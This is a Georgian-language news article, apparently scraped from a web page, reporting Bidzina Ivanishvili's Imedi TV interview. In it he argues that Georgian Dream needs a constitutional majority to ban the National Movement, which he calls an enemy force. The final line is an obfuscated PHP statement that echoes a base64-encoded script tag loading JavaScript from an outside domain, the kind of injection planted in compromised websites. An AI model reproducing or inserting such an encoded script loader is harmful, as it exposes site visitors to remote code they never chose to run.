celsiusi
ავერსი საქკაბელი

„ქართული ოცნებაც“ ალბათ ამოუვიდა ხალხს ყელში 12 წლის განმავლობაში, დემოკრატიულ სახელმწიფოში, რომ ერთი და იგივე ხელისუფლება აირჩიო ძალიან რთულია, ჩემი გვარის გაგონება მე თვითონ მომწყინდა, - ამის შესახებ „ქართული ოცნების“ საპატიო თავმჯდომარემ, ბიძინა ივანიშვილმა, ტელეკომპანია „იმედთან“ ექსკლუზიურ ინტერვიუში განაცხადა.

ივანიშვილის განცხადებით, მიუხედავად ამისა, იმისათვის რომ ხელისუფლებაში "ნაციონალური მოძრაობა" არ დაბრუნდეს, "ოცნებამ" საკონსტიტუციო უმრავლესობა უნდა მოიპოვს.

„არჩევნების მოგება არ არის გადამწყვეტი, იმიტომ ვამბობ, რომ ჩვენ გვჭირდება საკონსტიტუციო უმრავლესობა, რომ ესენი ავკრძალოთ და მოვიშოროთ. წინააღმდეგ შემთხვევაში, ჩვენ თუ ვერ მივიღეთ საკონსტიტუციო უმრავლესობა, მარტივი უმრავლესობის მიღება, ჩვენ საერთოდ რომ არ გავიდეთ, გავჩერდეთ და ტელევიზიის შემდეგ, „ქართულმა ოცნებამ“ საერთოდ შეაჩეროს მოძრაობა, იმდენ დეპუტატს, არც ჩვენ გვყავს პარლამენტში, ყველა შემთხვევაში ვიღებთ, ყველა რეიტინგით, არანაირი პრობლემა არ არის, მაგრამ ჩვენ გვჭირდება ასეთი ლეგიტიმაცია, ჩვენ გვინდა ეს, რომ როგორმე მოვიშოროთ ეს ჭირი, წინააღმდეგ შემთხვევაში გარწმუნებთ, რომ არაფერი არ იქნება, 27-ში გარწმუნებთ, რომ არაფერი არ იქნება, 27-ში არ იქნება, მაგრამ ერთი თვის შემდეგ 27-ში შეიძლება რაღაც გაუგებრობა ხორავას ქუჩის მსგავსი მოხდეს, საზოგადოება წამოიკიდონ უბედურება მივიღოთ და დაბრუნდნენ.

შემდეგ არ იფიქროთ, რომ აქ არჩევნები ჩატარდეს ან იმის მსგავსი „ნაცები“, რაც მაშინ იყვნენ და გვახსოვს, ის აიყვანეთ კვადრატში ან კუბში, რაც ხდებოდა მაშინ, მყისიერად მოხდება და მივიღებთ ყველაზე დიდ უბედურებას, აი ეს არის რეალობა, ამიტომაც ეს ძალა არის მოსაშორებელი, თუ არ მოკვეთე სიმსივნე - ის გავრცელდება, არა და ოდესღაც დაძაბუნდება ორგანიზმი.

„ქართული ოცნებაც“ ალბათ ამოუვიდა ხალხს ყელში 12 წლის განმავლობაში, დემოკრატიულ სახელმწიფოში, რომ ერთი და იგივე ხელისუფლება აირჩიო ძალიან რთულია, ჩემი გვარის გაგონება მე თვითონ მომწყინდა. აღარ უნდათ ერთი და იგივე სახეები და ეს ხალხს შეიძლება ძალიან კარგად გაუგო. საკმარისია გარედან პატარა მიზეზი და მაშინვე სიტუაცია აფეთქდება, აი ხორავას ქუჩა გაიხსენეთ, პროკურატურა არაფერ შუაში იყო, მაგრამ ისე ჩააწოდეს თავის დროზე და ამაში დაეხმარნენ, რა თქმა უნდა, ოპოზიციონერები, რომ საზოგადოების ღელვა იყო ისეთი, იქ რომ ახლოს რამე არჩევნების მსგავსი ყოფილიყო „ქართული ოცნება“ ხელისუფლებას დაკარგავდა. აი ამიტომ არის ძალიან საშიში ამ ხალხის პოლიტიკაში დატოვება, ეს არის ბოროტი ძალა ეს არის ქვეყნის მტერი ძალა, პრეცედენტები უამრავია პოლიტიკაში პოლიტიკური პარტიების აკრძალვის, ასეთი კარგი საფუძველი ჩვენ, რომ გვაქვს მხოლოდ ფაშისტურ გერმანიას ჰქონდა შეიძლება, როდესაც ნიურნბერგის პროცესი მოხდა გახსოვთ და ჩვენც თითქმის მსგავსი დოკუმენტაცია გაგვაჩნია“,- განაცხადა ბიძინა ივანიშვილმა.

68
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");